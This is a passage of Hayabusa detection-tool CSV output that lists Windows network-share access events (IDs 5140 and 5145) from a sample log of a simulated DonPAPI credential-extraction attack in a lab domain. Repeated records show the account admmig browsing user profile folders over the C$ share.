\??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop 
| IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.736 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 